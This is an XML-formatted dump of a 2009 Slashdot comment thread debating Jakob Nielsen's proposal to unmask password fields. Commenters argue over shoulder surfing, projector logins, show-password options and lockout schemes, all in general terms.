<tokenext>I would hope that most eight-year-olds have n't been exposed to the kind of language I use in my passwords .</tokentext>
<sentencetext>I would hope that most eight-year-olds haven't been exposed to the kind of language I use in my passwords.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471163</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471619</id>
	<title>Debit card: enter digits with 3 fingers</title>
	<author>KWTm</author>
	<datestamp>1245922140000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><blockquote><div><p>the over-the-shoulder-attack... That will work even WITH masked passwords, which I found out when a woman watched me use my debit card. Lot of good it did me for the numbers to not be displayed when she simply had to look at what keys I was pressing. In the case of ATMs, masking it "security theater".</p></div> </blockquote><p>When I enter PIN's or other private information on a digital pad, I make it a habit of using 3 fingers (2nd, 3rd, 4th fingers) and just move it between the 3 rows of the numeric keypad.  It's not as inconvenient or gauche as covering the keys (and your other hand might be busy covering up the screen anyway), and at least they can't tell the difference between 1/2/3, 4/5/6, or 7/8/9.   If the digit 0 exists in the number, I will cover the keys 7/0/9, and also use the same finger pattern for the other numbers so 1/5/3 look the same, 4/8/6 look the same, etc.  (This refers to a phone-type keypad with 1-2-3 at the top.  For calculator-type keypads with 7-8-9 at the top, the same applies, but for different digits, of course.)</p><blockquote><div><p>Good security involves locking out the user after a certain number of attempts in order to stop a "dictionary attack". I just had to reset a users PW twice this afternoon because she locked herself out of her account. Sure, it's extra hassle but the security is worth it.</p></div></blockquote><p>My own favourite, about which I've posted before, is to gradually (but exponentially) increase the delay between entries, so after 1 failure, you can retry in 1 second; after 2 failures, 3 seconds.  The third failure locks it for 9 seconds, and by the time the brute-forcer is on the 5th time, he'll be waiting almost a minute and a half (and rapidly increasing --you can only do 9 tries the first hour).</p></div>
	</htmltext>
<tokenext>the over-the-shoulder-attack... That will work even WITH masked passwords , which I found out when a woman watched me use my debit card .
Lot of good it did me for the numbers to not be displayed when she simply had to look at what keys I was pressing .
In the case of ATMs , masking it " security theater " .
When I enter PIN 's or other private information on a digital pad , I make it a habit of using 3 fingers ( 2nd , 3rd , 4th fingers ) and just move it between the 3 rows of the numeric keypad .
It 's not as inconvenient or gauche as covering the keys ( and your other hand might be busy covering up the screen anyway ) , and at least they ca n't tell the difference between 1/2/3 , 4/5/6 , or 7/8/9 .
If the digit 0 exists in the number , I will cover the keys 7/0/9 , and also use the same finger pattern for the other numbers so 1/5/3 look the same , 4/8/6 look the same , etc .
( This refers to a phone-type keypad with 1-2-3 at the top .
For calculator-type keypads with 7-8-9 at the top , the same applies , but for different digits , of course .
) Good security involves locking out the user after a certain number of attempts in order to stop a " dictionary attack " .
I just had to reset a users PW twice this afternoon because she locked herself out of her account .
Sure , it 's extra hassle but the security is worth it.My own favourite , about which I 've posted before , is to gradually ( but exponentially ) increase the delay between entries , so after 1 failure , you can retry in 1 second ; after 2 failures , 3 seconds .
The third failure locks it for 9 seconds , and by the time the brute-forcer is on the 5th time , he 'll be waiting almost a minute and a half ( and rapidly increasing --you can only do 9 tries the first hour ) .</tokentext>
<sentencetext>the over-the-shoulder-attack... That will work even WITH masked passwords, which I found out when a woman watched me use my debit card.
Lot of good it did me for the numbers to not be displayed when she simply had to look at what keys I was pressing.
In the case of ATMs, masking it "security theater".
When I enter PIN's or other private information on a digital pad, I make it a habit of using 3 fingers (2nd, 3rd, 4th fingers) and just move it between the 3 rows of the numeric keypad.
It's not as inconvenient or gauche as covering the keys (and your other hand might be busy covering up the screen anyway), and at least they can't tell the difference between 1/2/3, 4/5/6, or 7/8/9.
If the digit 0 exists in the number, I will cover the keys 7/0/9, and also use the same finger pattern for the other numbers so 1/5/3 look the same, 4/8/6 look the same, etc.
(This refers to a phone-type keypad with 1-2-3 at the top.
For calculator-type keypads with 7-8-9 at the top, the same applies, but for different digits, of course.
)Good security involves locking out the user after a certain number of attempts in order to stop a "dictionary attack".
I just had to reset a users PW twice this afternoon because she locked herself out of her account.
Sure, it's extra hassle but the security is worth it.My own favourite, about which I've posted before, is to gradually (but exponentially) increase the delay between entries, so after 1 failure, you can retry in 1 second; after 2 failures, 3 seconds.
The third failure locks it for 9 seconds, and by the time the brute-forcer is on the 5th time, he'll be waiting almost a minute and a half (and rapidly increasing --you can only do 9 tries the first hour).
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470981</id>
	<title>Solutions exist...</title>
	<author>Manip</author>
	<datestamp>1245963240000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>The sad truth is that better methods for handling password boxes have existed for years but haven't been picked up for whatever reason. The truth is that Microsoft really does deserve a fair bit of blame considering the OS generates most password boxes.</p><p>A nice password box that I've used would display the last character you typed for a very short period of time and then convert it into a dot. So as you type you can read it back to yourself but without really making it easy for anyone around you to see your completed password. Worked great.</p></htmltext>
<tokenext>The sad truth is that better methods for handling password boxes have existed for years but have n't been picked up for whatever reason .
The truth is that Microsoft really does deserve a fair bit of blame considering the OS generates most password boxes.A nice password box that I 've used would display the last character you typed for a very short period of time and then convert it into a dot .
So as you type you can read it back to yourself but without really making it easy for anyone around you to see your completed password .
Worked great .</tokentext>
<sentencetext>The sad truth is that better methods for handling password boxes have existed for years but haven't been picked up for whatever reason.
The truth is that Microsoft really does deserve a fair bit of blame considering the OS generates most password boxes.A nice password box that I've used would display the last character you typed for a very short period of time and then convert it into a dot.
So as you type you can read it back to yourself but without really making it easy for anyone around you to see your completed password.
Worked great.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472905</id>
	<title>Re:Runaway security</title>
	<author>ChrisMounce</author>
	<datestamp>1245926400000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Passwords are the gateway to more extreme security measures! Airports started using passwords on their computers, and now they're a step away from making you take off your underwear in order to board a plane.

<br><br> <a href="http://en.wikipedia.org/wiki/Slippery\_slope" title="wikipedia.org">Slippery slope</a> [wikipedia.org] and <a href="http://en.wikipedia.org/wiki/Hasty\_generalization" title="wikipedia.org">hasty generalization</a> [wikipedia.org] all in one. Not all security is obnoxious, and not all security will lead to obnoxious security.</htmltext>
<tokenext>Passwords are the gateway to more extreme security measures !
Airports started using passwords on their computers , and now they 're a step away from making you take off your underwear in order to board a plane .
Slippery slope [ wikipedia.org ] and hasty generalization [ wikipedia.org ] all in one .
Not all security is obnoxious , and not all security will lead to obnoxious security .</tokentext>
<sentencetext>Passwords are the gateway to more extreme security measures!
Airports started using passwords on their computers, and now they're a step away from making you take off your underwear in order to board a plane.
Slippery slope [wikipedia.org] and hasty generalization [wikipedia.org] all in one.
Not all security is obnoxious, and not all security will lead to obnoxious security.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471327</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471413</id>
	<title>why not bio passcodes?</title>
	<author>Anonymous</author>
	<datestamp>1245921480000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>the biometric password would not need to enter text<br>and the fingerprint scanner's importance would grow.<br>text pass-codes could be a back up or vice versa.</p></htmltext>
<tokenext>the biometric password would not need to enter textand the fingerprint scanner 's importance would grow.text pass-codes could be a back up or vice versa .</tokentext>
<sentencetext>the biometric password would not need to enter textand the fingerprint scanner's importance would grow.text pass-codes could be a back up or vice versa.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471089</id>
	<title>Well its about doggone time</title>
	<author>Gat1024</author>
	<datestamp>1245920520000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Really, what good are the dots? It doesn't prevent someone from looking over your shoulder. A villain can just look at your keyboard while you type. Maybe its of some use on a public terminal, but I check my six before I type in a security password anyway.

</p><p>The obscured pass(word|phrase|key) has been the most aggravating while trying to type in a strong WiFi password on an IPhone (pre 2.something-or-nother update). Try it. The aggravation is pure ecstasy. Luckily Apple has wised up and shows you the last character you've typed at least.

</p><p>And how about disabling paste from a security box. You can't verify your passkey when you're troubleshooting. A determined villain can get to it anyway, especially if they have access to your machine. Don't even get me started on the 'super' secure entry boxes where you can't paste TO the security edit box.</p></htmltext>
<tokenext>Really , what good are the dots ?
It does n't prevent someone from looking over your shoulder .
A villain can just look at your keyboard while you type .
Maybe its of some use on a public terminal , but I check my six before I type in a security password anyway .
The obscured pass ( word | phrase | key ) has been the most aggravating while trying to type in a strong WiFi password on an IPhone ( pre 2.something-or-nother update ) .
Try it .
The aggravation is pure ecstasy .
Luckily Apple has wised up and shows you the last character you 've typed at least .
And how about disabling paste from a security box .
You ca n't verify your passkey when you 're troubleshooting .
A determined villain can get to it anyway , especially if they have access to your machine .
Do n't even get me started on the 'super ' secure entry boxes where you ca n't paste TO the security edit box .</tokentext>
<sentencetext>Really, what good are the dots?
It doesn't prevent someone from looking over your shoulder.
A villain can just look at your keyboard while you type.
Maybe its of some use on a public terminal, but I check my six before I type in a security password anyway.
The obscured pass(word|phrase|key) has been the most aggravating while trying to type in a strong WiFi password on an IPhone (pre 2.something-or-nother update).
Try it.
The aggravation is pure ecstasy.
Luckily Apple has wised up and shows you the last character you've typed at least.
And how about disabling paste from a security box.
You can't verify your passkey when you're troubleshooting.
A determined villain can get to it anyway, especially if they have access to your machine.
Don't even get me started on the 'super' secure entry boxes where you can't paste TO the security edit box.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28479709</id>
	<title>No no NO. Not even going to bother RTFA</title>
	<author>w0mprat</author>
	<datestamp>1246015620000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>There are a few good reasons why passwords are masked, more than just the over-your-shoulder password spying. It is possible to capture a monitor signal either from interfering with the cabling, or special equipment capturing reflected light (suprisingly effective with CRTs). I've heard of information being stolen by a VGA splitter installed on a machine - but they didn't get any sensitive passwords.
<br> <br>
Next, a technician may be remotely supporting a user, be viewing their desktop session and require the user to enter a password that the technician does not have clearance to know. Or even in a screen sharing session during collaboration. One can access and demonstrate systems without giving away passwords, this is especially good when one has their laptop plugged into a projector in a meeting room.
<br> <br>
(I once had to do this, giving a presentation on a software package, and the password entry for this package as not masked... as I was about to type I suddenly remembered my password was something really rude)
<br> <br>
There are many scenarios where password masking is useful and there are little compelling reason to have clear text password entry. In terms of cost to business for support, allowing more than 3 password attempts, ie 5 or 6, would solve more problems with less security risk. If this was what Jakob Nielsen was talking about I would bother reading past the first few lines of the Slashdot post.</htmltext>
<tokenext>There are a few good reasons why passwords are masked , more than just the over-your-shoulder password spying .
It is possible to capture a monitor signal either from interfering with the cabling , or special equipment capturing reflected light ( suprisingly effective with CRTs ) .
I 've heard of information being stolen by a VGA splitter installed on a machine - but they did n't get any sensitive passwords .
Next , a technician may be remotely supporting a user , be viewing their desktop session and require the user to enter a password that the technician does not have clearance to know .
Or even in a screen sharing session during collaboration .
One can access and demonstrate systems without giving away passwords , this is especially good when one has their laptop plugged into a projector in a meeting room .
( I once had to do this , giving a presentation on a software package , and the password entry for this package as not masked... as I was about to type I suddenly remembered my password was something really rude ) There are many scenarios where password masking is useful and there are little compelling reason to have clear text password entry .
In terms of cost to business for support , allowing more than 3 password attempts , ie 5 or 6 , would solve more problems with less security risk .
If this was what Jakob Nielsen was talking about I would bother reading past the first few lines of the Slashdot post .</tokentext>
<sentencetext>There are a few good reasons why passwords are masked, more than just the over-your-shoulder password spying.
It is possible to capture a monitor signal either from interfering with the cabling, or special equipment capturing reflected light (suprisingly effective with CRTs).
I've heard of information being stolen by a VGA splitter installed on a machine - but they didn't get any sensitive passwords.
Next, a technician may be remotely supporting a user, be viewing their desktop session and require the user to enter a password that the technician does not have clearance to know.
Or even in a screen sharing session during collaboration.
One can access and demonstrate systems without giving away passwords, this is especially good when one has their laptop plugged into a projector in a meeting room.
(I once had to do this, giving a presentation on a software package, and the password entry for this package as not masked... as I was about to type I suddenly remembered my password was something really rude)
 
There are many scenarios where password masking is useful and there are little compelling reason to have clear text password entry.
In terms of cost to business for support, allowing more than 3 password attempts, ie 5 or 6, would solve more problems with less security risk.
If this was what Jakob Nielsen was talking about I would bother reading past the first few lines of the Slashdot post.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471873</id>
	<title>Re:One word for Nielsen: Projector</title>
	<author>Anonymous</author>
	<datestamp>1245922920000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p><div class="quote"><p>Ever logged in to a computer connected to an LCD projector?</p></div><p>No I have to confess I have never been this stupid.</p></div>
	</htmltext>
<tokenext>Ever logged in to a computer connected to an LCD projector ? No I have to confess I have never been this stupid .</tokentext>
<sentencetext>Ever logged in to a computer connected to an LCD projector?No I have to confess I have never been this stupid.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470993</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472177</id>
	<title>Why is this guy an expert???</title>
	<author>Morris Thorpe</author>
	<datestamp>1245923760000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>In the span of one hour, there are more than a dozen solid reasons posted as to why this is not a good idea. Just about all of them obvious. Did Nielsen not consider these? Does he pull these declarations out of his ass without any thought?</p><p>In TFA: "Let's clean up the Web's cobwebs and remove stuff that's there only because it's always been there."<br>Agreed. Let's begin with self-appointed usability gurus.</p></htmltext>
<tokenext>In the span of one hour , there are more than a dozen solid reasons posted as to why this is not a good idea .
Just about all of them obvious .
Did Nielsen not consider these ?
Does he pull these declarations out of his ass without any thought ? In TFA : " Let 's clean up the Web 's cobwebs and remove stuff that 's there only because it 's always been there. " Agreed .
Let 's begin with self-appointed usability gurus .</tokentext>
<sentencetext>In the span of one hour, there are more than a dozen solid reasons posted as to why this is not a good idea.
Just about all of them obvious.
Did Nielsen not consider these?
Does he pull these declarations out of his ass without any thought?In TFA: "Let's clean up the Web's cobwebs and remove stuff that's there only because it's always been there."Agreed.
Let's begin with self-appointed usability gurus.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471021</id>
	<title>Cash Machines!</title>
	<author>oolon</author>
	<datestamp>1245963420000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I wonder why they don't do this with cash machines, it sure would help with skimming easier, rather than having to look at those fingers! Idiots!

Now we can crash a co-workers computer and get got watch the password being typed it.</htmltext>
<tokenext>I wonder why they do n't do this with cash machines , it sure would help with skimming easier , rather than having to look at those fingers !
Idiots ! Now we can crash a co-workers computer and get got watch the password being typed it .</tokentext>
<sentencetext>I wonder why they don't do this with cash machines, it sure would help with skimming easier, rather than having to look at those fingers!
Idiots!

Now we can crash a co-workers computer and get got watch the password being typed it.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472619</id>
	<title>He Doesn't Sound Like Much Of An Expert</title>
	<author>Cheirdal</author>
	<datestamp>1245925260000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I've been in hundreds of meetings (literally) where someone has logged into an account in front of us using the projector. Whether this was a windows account or a website (as the author is talking about) password masking was in play. Password masking is a good thing. Someone shouldn't have to reset their password every time they demonstrate something at a meeting because everyone watches them type in their clear text password. If someone is incapable of typing in their password without seeing it on the screen in front of them then perhaps they shouldn't be using computers.</htmltext>
<tokenext>I 've been in hundreds of meetings ( literally ) where someone has logged into an account in front of us using the projector .
Whether this was a windows account or a website ( as the author is talking about ) password masking was in play .
Password masking is a good thing .
Someone should n't have to reset their password every time they demonstrate something at a meeting because everyone watches them type in their clear text password .
If someone is incapable of typing in their password without seeing it on the screen in front of them then perhaps they should n't be using computers .</tokentext>
<sentencetext>I've been in hundreds of meetings (literally) where someone has logged into an account in front of us using the projector.
Whether this was a windows account or a website (as the author is talking about) password masking was in play.
Password masking is a good thing.
Someone shouldn't have to reset their password every time they demonstrate something at a meeting because everyone watches them type in their clear text password.
If someone is incapable of typing in their password without seeing it on the screen in front of them then perhaps they shouldn't be using computers.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471765</id>
	<title>oh no</title>
	<author>burris</author>
	<datestamp>1245922560000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Some interlocutor might learn the password to my account on the Greater Cleveland Beanie Baby Collectors web forum.</p></htmltext>
<tokenext>Some interlocutor might learn the password to my account on the Greater Cleveland Beanie Baby Collectors web forum .</tokentext>
<sentencetext>Some interlocutor might learn the password to my account on the Greater Cleveland Beanie Baby Collectors web forum.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471293</id>
	<title>Usability?</title>
	<author>thisnamestoolong</author>
	<datestamp>1245921120000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Is this really that big of a problem? Are corporations losing millions of dollars a year in downtime due to people typing in their passwords incorrectly? Maybe throwing computers out of windows? It is pretty idiotic to assume that there is no use for password masking -- in my office there are plenty of opportunities for a passerby to take a peek at my screen, I don't want my password visible! Yesterday I started typing my password in the username box and immediately changed my password, lest anyone else saw it. This would be a HUGE security hole and a HUGE step back -- how do idiots like this get to call themselves experts?</htmltext>
<tokenext>Is this really that big of a problem ?
Are corporations losing millions of dollars a year in downtime due to people typing in their passwords incorrectly ?
Maybe throwing computers out of windows ?
It is pretty idiotic to assume that there is no use for password masking -- in my office there are plenty of opportunities for a passerby to take a peek at my screen , I do n't want my password visible !
Yesterday I started typing my password in the username box and immediately changed my password , lest anyone else saw it .
This would be a HUGE security hole and a HUGE step back -- how do idiots like this get to call themselves experts ?</tokentext>
<sentencetext>Is this really that big of a problem?
Are corporations losing millions of dollars a year in downtime due to people typing in their passwords incorrectly?
Maybe throwing computers out of windows?
It is pretty idiotic to assume that there is no use for password masking -- in my office there are plenty of opportunities for a passerby to take a peek at my screen, I don't want my password visible!
Yesterday I started typing my password in the username box and immediately changed my password, lest anyone else saw it.
This would be a HUGE security hole and a HUGE step back -- how do idiots like this get to call themselves experts?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478853</id>
	<title>Already on the Mac: Show Password checkbox</title>
	<author>samdutton</author>
	<datestamp>1246049940000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>You already get this on Mac OS X, in some dialogs at least: a checkbox to select whether or not you want to hide the password while you're typing.

Very useful when you're either not worried about the password, you're on your own, or trying to enter a slightly tricky password and not sure whether you got it right.</htmltext>
<tokenext>You already get this on Mac OS X , in some dialogs at least : a checkbox to select whether or not you want to hide the password while you 're typing .
Very useful when you 're either not worried about the password , you 're on your own , or trying to enter a slightly tricky password and not sure whether you got it right .</tokentext>
<sentencetext>You already get this on Mac OS X, in some dialogs at least: a checkbox to select whether or not you want to hide the password while you're typing.
Very useful when you're either not worried about the password, you're on your own, or trying to enter a slightly tricky password and not sure whether you got it right.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473505</id>
	<title>Re:Runaway security</title>
	<author>bwcbwc</author>
	<datestamp>1245928980000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext><p>That FTP IS stupid. They should switch to SFTP and require digital certificates to connect, so they can authenticate connections without compromising login credentials.</p></htmltext>
<tokenext>That FTP IS stupid .
They should switch to SFTP and require digital certificates to connect , so they can authenticate connections without compromising login credentials .</tokentext>
<sentencetext>That FTP IS stupid.
They should switch to SFTP and require digital certificates to connect, so they can authenticate connections without compromising login credentials.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471327</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473503</id>
	<title>Re:Two words</title>
	<author>Guanix</author>
	<datestamp>1245928980000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>I think the contribution of Nielsen's idea, if any, is to remind us all that security always involves tradeoffs. You're right that masking passwords provides some protection--most security measures, even the inane ones, provide some protection. You know, someone really <i>could</i> hide a bomb in their shoe.</p><p>But of course that is not the end of the story. Nielsen, and others such as Bruce Schneier, want us to ask <i>how much</i> security the solution provides, what the costs are, and whether it provides a good tradeoff. If shoulder surfing is relatively rare, and the possible harm for the site in question is small, and the costs are relatively large (lost customers etc), then maybe a site or program shouldn't mask passwords even if they provide some security.</p><p>Sure, Jakob Nielsen may be wrong about the tradeoff in this case, and may not have enough evidence to back up his arguments, but I would argue that pointing out that the solution provides a nonzero amount of security does not resolve the question.</p></htmltext>
<tokenext>I think the contribution of Nielsen 's idea , if any , is to remind us all that security always involves tradeoffs .
You 're right that masking passwords provides some protection--most security measures , even the inane ones , provide some protection .
You know , someone really could hide a bomb in their shoe.But of course that is not the end of the story .
Nielsen , and others such as Bruce Schneier , want us to ask how much security the solution provides , what the costs are , and whether it provides a good tradeoff .
If shoulder surfing is relatively rare , and the possible harm for the site in question is small , and the costs are relatively large ( lost customers etc ) , then maybe a site or program should n't mask passwords even if they provide some security.Sure , Jakob Nielsen may be wrong about the tradeoff in this case , and may not have enough evidence to back up his arguments , but I would argue that pointing out that the solution provides a nonzero amount of security does not resolve the question .</tokentext>
<sentencetext>I think the contribution of Nielsen's idea, if any, is to remind us all that security always involves tradeoffs.
You're right that masking passwords provides some protection--most security measures, even the inane ones, provide some protection.
You know, someone really could hide a bomb in their shoe.But of course that is not the end of the story.
Nielsen, and others such as Bruce Schneier, want us to ask how much security the solution provides, what the costs are, and whether it provides a good tradeoff.
If shoulder surfing is relatively rare, and the possible harm for the site in question is small, and the costs are relatively large (lost customers etc), then maybe a site or program shouldn't mask passwords even if they provide some security.Sure, Jakob Nielsen may be wrong about the tradeoff in this case, and may not have enough evidence to back up his arguments, but I would argue that pointing out that the solution provides a nonzero amount of security does not resolve the question.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471193</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472135</id>
	<title>un-mask password button</title>
	<author>bl8n8r</author>
	<datestamp>1245923640000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I've seen radio buttons (dd\_wrt) that un-mask the password for trouble shooting. This is kinda nice.</htmltext>
<tokenext>I 've seen radio buttons ( dd \ _wrt ) that un-mask the password for trouble shooting .
This is kinda nice .</tokentext>
<sentencetext>I've seen radio buttons (dd\_wrt) that un-mask the password for trouble shooting.
This is kinda nice.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471209</id>
	<title>Reason for masking matters</title>
	<author>Todd Knarr</author>
	<datestamp>1245920820000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Masking was intended to keep people from shoulder-surfing your password as you entered it. In the days of public computer rooms where you'd have a dozen people behind you who could see your screen, masking made a lot of sense. When you're already in private, though, and there's nobody behind you to see your screen, password masking <i>doesn't</i> make any sense anymore. However, if you think about it there's still lots of time when you're not in private. In your own home you don't need masking most times, but think about sitting at the local coffee shop. Or in the airport on a trip. Or in an open-plan office. All those times you may have someone behind you who can see your screen. Or who's got a camera with enough resolution he can enlarge the picture later to get the screen contents. Those times I'd prefer the passwords be masked so eavesdroppers can't see them.</p><p>Of course the two aren't mutually exclusive. HTML for instance defines fields that're protected/masked. Just use them and let the user control with a setting whether protected/masked fields should be masked or their contents displayed. Then the user can decide which to use, and they're the ones who'll have to bear the consequences if their password gets out so they've an incentive to make a reasonable choice.</p></htmltext>
<tokenext>Masking was intended to keep people from shoulder-surfing your password as you entered it .
In the days of public computer rooms where you 'd have a dozen people behind you who could see your screen , masking made a lot of sense .
When you 're already in private , though , and there 's nobody behind you to see your screen , password masking does n't make any sense anymore .
However , if you think about it there 's still lots of time when you 're not in private .
In your own home you do n't need masking most times , but think about sitting at the local coffee shop .
Or in the airport on a trip .
Or in an open-plan office .
All those times you may have someone behind you who can see your screen .
Or who 's got a camera with enough resolution he can enlarge the picture later to get the screen contents .
Those times I 'd prefer the passwords be masked so eavesdroppers ca n't see them.Of course the two are n't mutually exclusive .
HTML for instance defines fields that 're protected/masked .
Just use them and let the user control with a setting whether protected/masked fields should be masked or their contents displayed .
Then the user can decide which to use , and they 're the ones who 'll have to bear the consequences if their password gets out so they 've an incentive to make a reasonable choice .</tokentext>
<sentencetext>Masking was intended to keep people from shoulder-surfing your password as you entered it.
In the days of public computer rooms where you'd have a dozen people behind you who could see your screen, masking made a lot of sense.
When you're already in private, though, and there's nobody behind you to see your screen, password masking doesn't make any sense anymore.
However, if you think about it there's still lots of time when you're not in private.
In your own home you don't need masking most times, but think about sitting at the local coffee shop.
Or in the airport on a trip.
Or in an open-plan office.
All those times you may have someone behind you who can see your screen.
Or who's got a camera with enough resolution he can enlarge the picture later to get the screen contents.
Those times I'd prefer the passwords be masked so eavesdroppers can't see them.Of course the two aren't mutually exclusive.
HTML for instance defines fields that're protected/masked.
Just use them and let the user control with a setting whether protected/masked fields should be masked or their contents displayed.
Then the user can decide which to use, and they're the ones who'll have to bear the consequences if their password gets out so they've an incentive to make a reasonable choice.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471799</id>
	<title>Re:hunter2</title>
	<author>bhagwad</author>
	<datestamp>1245922680000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Logging in at home, my kids can see my password (if I had them). My wife could see it. NO ONE knows my password - actually not even me (most of them)! I use Firefox add ons to randomly generate them and use Javascript to submit them - I know just one or two.<br> <br>

Passwords and plain text don't go together.</htmltext>
<tokenext>Logging in at home , my kids can see my password ( if I had them ) .
My wife could see it .
NO ONE knows my password - actually not even me ( most of them ) !
I use Firefox add ons to randomly generate them and use Javascript to submit them - I know just one or two .
Passwords and plain text do n't go together .</tokentext>
<sentencetext>Logging in at home, my kids can see my password (if I had them).
My wife could see it.
NO ONE knows my password - actually not even me (most of them)!
I use Firefox add ons to randomly generate them and use Javascript to submit them - I know just one or two.
Passwords and plain text don't go together.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472595</id>
	<title>Re:Two words</title>
	<author>Tubal-Cain</author>
	<datestamp>1245925200000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>And even then, if you're typing fast enough or the keys are close enough together you won't be able to guess the password by watching the keyboard. Hell, I'm sitting right in front of the keyboard and I still can't look through my hands to see which keys my fingertips are actually pressing.</p></div><p>And then there's the Shift key...</p></div>
	</htmltext>
<tokenext>And even then , if you 're typing fast enough or the keys are close enough together you wo n't be able to guess the password by watching the keyboard .
Hell , I 'm sitting right in front of the keyboard and I still ca n't look through my hands to see which keys my fingertips are actually pressing.And then there 's the Shift key.. .</tokentext>
<sentencetext>And even then, if you're typing fast enough or the keys are close enough together you won't be able to guess the password by watching the keyboard.
Hell, I'm sitting right in front of the keyboard and I still can't look through my hands to see which keys my fingertips are actually pressing.And then there's the Shift key...
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471193</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473511</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>legirons</author>
	<datestamp>1245928980000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>If someone can shouldersurf, 99\% of the time they have physical access and all security is null</p></div><p>So when you give a presentation at a conference, everyone watching the projector-screen has r00ted your laptop?</p></div>
	</htmltext>
<tokenext>If someone can shouldersurf , 99 \ % of the time they have physical access and all security is nullSo when you give a presentation at a conference , everyone watching the projector-screen has r00ted your laptop ?</tokentext>
<sentencetext>If someone can shouldersurf, 99\% of the time they have physical access and all security is nullSo when you give a presentation at a conference, everyone watching the projector-screen has r00ted your laptop?
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473235</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>PitaBred</author>
	<datestamp>1245927660000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Thing is that it's trivial for most people to shoulder surf a password. It takes significantly more skill for someone to install a keylogger, tap cables, whatever. A coworker that has a beef with someone else could easily shoulder-surf a Facebook password, log in on their own time and cause all kinds of mischief without much technical knowledge. It's not stealing money, but that's the kind of thing that affects people a lot.</htmltext>
